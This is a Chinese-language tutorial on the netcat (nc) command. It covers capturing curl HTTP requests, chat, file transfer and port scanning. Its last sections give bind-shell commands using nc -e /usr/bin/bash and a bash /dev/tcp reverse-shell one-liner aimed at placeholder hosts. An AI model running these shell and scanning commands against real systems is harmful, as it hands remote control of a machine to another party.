命令 nc
类别: Command 标签: Linux nc netcat目录
捕获 HTTP 请求的内容
- 监听端口,用于捕获数据。
nc -l port - 发送 HTTP 请求。
curl http://ip:port/
GET 请求
curl http://127.0.0.1:8000/
GET /?name=wjj HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: curl/7.61.1
Accept: */*
POST JSON 请求
curl --location --request POST 'http://127.0.0.1:8000/users_by_json' \
--header 'Content-Type: application/json' \
--data-raw '{
"name": "wjj",
"age": 40
}'
POST /users_by_json HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: curl/7.61.1
Accept: */*
Content-Type: application/json
Content-Length: 36
{
"name": "wjj",
"age": 40
}
POST File 请求
curl --location --request POST 'http://127.0.0.1:8000/uploadfile' --form 'file=@"test.jpg"'
POST /uploadfile HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: curl/7.64.1
Accept: */*
Content-Length: 1604
Content-Type: multipart/form-data; boundary=------------------------f512f8a3c3a9b436
Expect: 100-continue
--------------------------f512f8a3c3a9b436
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
????JFIFHH??XExifMM?i&?? ? ??8Photoshop 3.08BIM8BIM%??ُ?? ???B~? "??
???w!1AQaq"2B???? #3R?br?
$4?%?&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz??????????????????????????????????????????????????????C
^????P????O????n?g??yH?ʑ0!??`??'??`{??=? ??O?N??\鳤????:???_u?.??|?;??߈2x?XO?y।M?? ?ʼn?
???d/i?+?Z]J?]2?Q2?:??ܨe?P??\?%?O?ʜ?N??=?????2?.?T?X?߽?k?w?????
--------------------------f512f8a3c3a9b436--
因为是二进制数据,所以有许多乱码,可以在使用 nc 监听时将接收到的数据写入到文件中。
nc -l port > output_file
整理后获得下面的格式:
--------------------------f512f8a3c3a9b436\r\n
Content-Disposition: form-data; name="file"; filename="test.jpg"\r\n
Content-type: image/jpeg\r\n
\r\n
file content binary
\r\n
--------------------------f512f8a3c3a9b436--\r\n
--------------------------f512f8a3c3a9b436 是边界符,字母数字是随机生成的。在发送时指定的 Content-Type: multipart/form-data; boundary=------------------------f512f8a3c3a9b436 中的 boundary 值比组织数据中的少了 -- (两个减号字符)
发送消息
- 服务器端
nc -l -p port - 客户端
nc server_ip server_port
现在在服务器端和客户端相当于是一个聊天软件,在任意一端发送消息,对方都会收到。
文件传输
客户端传输文件到服务器端
- 服务器端
nc -l -p port > output_file文本或二进制都可以。
- 客户端
nc server_ip server_port < input_file
服务器端传输文件到客户端
- 服务器端
nc -l -p port < input_file - 客户端
nc server_ip server_port > output_file
端口扫描
扫描目标服务器的端口
一个端口
nc -n -z -w1 server_ip server_port
端口范围
nc -n -z -w1 server_ip server_start_port-server_end_port
CentOS8上不能使用端口范围
扫描本机所有正在使用的端口
nc -n -z -w1 127.0.0.1 1-65535
Connection to 127.0.0.1 port 22 [tcp/*] succeeded!
Connection to 127.0.0.1 port 4000 [tcp/*] succeeded!
......
远程执行程序
客户端远程执行服务器端的程序
- 服务器端
nc -l -p port -e /usr/bin/bash - 客户端
nc server_ip server_port#显示服务器端的文件列表 ls output.txt test.jpg #退出连接(服务器端程序也会退出) exit
服务器端远程执行客户端的程序
- 服务器端
nc -l -p port - 客户端
nc server_ip server_port -e /usr/bin/bash - 服务器端
#显示客户端的文件列表 ls input.txt test.jpg #退出连接(客户端程序也会退出) exit
连接转发
反弹 Shell
- 服务器端
nc -lvp 8000 - 客户端
bash -i >& /dev/tcp/server_ip/server_port 0>&1 - 重定向符:>&
- 文件描述符:
- 0 标准输入
- 1 标准输出
- 2 错误输出
- 服务器端
提示符和客户端一样,现在在服务器端操作就和在客户端操作是一样的。
参数
- -v 输出详细错误信息
- -n 不对目标机器进行DNS解析
- -z 只扫描监听守护进程,而不向它们发送任何数据。
- -w timeout 超时设置,单位(秒)